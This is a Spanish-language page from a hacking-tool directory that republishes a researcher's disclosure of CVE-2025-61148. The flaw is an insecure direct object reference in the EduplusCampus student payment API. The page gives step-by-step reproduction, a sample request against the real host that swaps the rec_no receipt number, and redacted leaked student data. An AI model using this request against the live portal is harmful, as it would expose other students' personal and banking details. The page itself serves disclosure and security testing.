Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-61148 — La vulnerabilidad existe en la Student Payment API. La aplicación no valida correctamente si el usuario que solicita un recibo está autorizado para verlo. Al modificar el parámetro rec_no en la solicitud de la API, un atacante puede acceder a los recibos de otros usuarios. | Kitploit
Herramientas/GitHubGitHub/sharma19d/cve-2025-61148
Análisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de Seguridad de APIsRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubsharma19d/cve-2025-61148

CVE-2025-61148

La vulnerabilidad existe en la Student Payment API. La aplicación no valida correctamente si el usuario que solicita un recibo está autorizado para verlo. Al modificar el parámetro rec_no en la solicitud de la API, un atacante puede acceder a los recibos de otros usuarios.

Ver Repositorio
4hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-61148

La vulnerabilidad existe en la API de Pagos de Estudiantes. La aplicación no valida correctamente si el usuario que solicita un recibo está autorizado a verlo. Al modificar el parámetro rec_no en la solicitud a la API, un atacante puede acceder a los recibos de otros usuarios.

CVE-2025-61148: IDOR en la API de Pagos de Estudiantes de EduplusCampus

CVE ID: CVE-2025-61148 Tipo de Vulnerabilidad: Referencia Directa Insegura a Objetos (IDOR) Producto Afectado: EduplusCampus Endpoint Afectado: /student/get-receipt Investigador: Vinay Sharma

Resumen

Se identificó una vulnerabilidad crítica de Referencia Directa Insegura a Objetos (IDOR) en el portal de estudiantes de EduplusCampus (versión 3.0.1). Esta vulnerabilidad permite a un usuario autenticado acceder a los registros personales y financieros sensibles de otros estudiantes modificando el parámetro rec_no en la solicitud a la API.

Impacto

La explotación exitosa permite a un atacante obtener:

  • Nombre completo y número de matrícula
  • Monto de pago y fechas
  • IDs de Transacción (TID) y detalles bancarios
  • Información Personal Identificable (PII)

Detalles de la Vulnerabilidad

La aplicación no valida correctamente la autorización del usuario que solicita un recibo de pago. El parámetro rec_no es secuencial o predecible, y el servidor devuelve los detalles del recibo para el número solicitado sin comprobar si pertenece al usuario que ha iniciado sesión.

Pasos para Reproducir

  1. Inicie sesión en el portal de estudiantes.
  2. Navegue a la sección de generación de recibos.
  3. Intercepte la solicitud POST a /student/get-receipt.
  4. Localice el parámetro rec_no en el cuerpo JSON.
  5. Modifique el valor de rec_no a otro número de recibo válido (por ejemplo, cambiando PCUF-232025 a PCUF-231824).
  6. Envíe la solicitud.
  7. El servidor responde con los detalles personales y financieros del estudiante asociado a ese número de recibo.
imagen
imagen

Ejemplo de Solicitud

root@kitploit:~
POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>

{
    "rec_no": "PCUF-233012"
}

### Leaked DATA Example:
{
    "fullname": "REDACTED_NAME",
    "rollno": "CSE2019XXX",
    "component_total_amount": 55000.0,
    "trans_list": [
        {
            "date": "21-Oct-2024",
            "mode": "Online",
            "amount": 55000.0,
            "tid": "42951XXXX"
        }
    ]
}

Información del Proveedor

  • Proveedor: EduplusCampus
  • Producto: Portal de Estudiantes de EduplusCampus / API de Pagos de Estudiantes

Versiones Afectadas

  • Versión: EduplusCampus 3.0.1

Descubridor

  • Vinay Sharma - Investigador de Seguridad
Descargar herramienta